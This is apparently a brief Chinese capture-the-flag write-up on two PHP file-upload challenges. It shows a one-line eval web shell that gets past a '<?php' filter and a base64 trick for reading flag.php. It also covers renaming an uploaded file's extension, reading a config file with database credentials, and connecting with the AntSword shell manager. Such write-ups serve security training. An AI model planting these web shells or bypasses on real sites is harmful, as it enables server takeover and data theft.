php文件上传

CTF

“百度杯”CTF比赛 2017 九月场-upload

题目描述

1
2
想怎么传就怎么传,就是这么任性。
tips:flag在flag.php中

过滤了<?php
使用
<script language='PhP'>@eval($_POST['cmd']);</script>
读取flag即可,有时候system函数无回显可以加上base64
cmd=system("cat ../flag.php | base64");然后解码即可

第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?

首先文件上传,抓包改后缀即可,然后发现没有flag!!!
但是读取config.php的时候

1
2
3
4
5
6
7
8
9
10
11
12
<?php
error_reporting(0);
session_start();
$servername = "localhost";
$username = "ctf";
$password = "ctfctfctf";
$database = "ctf";

// 创建连接
$conn = mysql_connect($servername,$username,$password) or die(" connect to mysql error");
mysql_select_db($database);
?>

然后通过蚁剑连接数据库,获得flag

img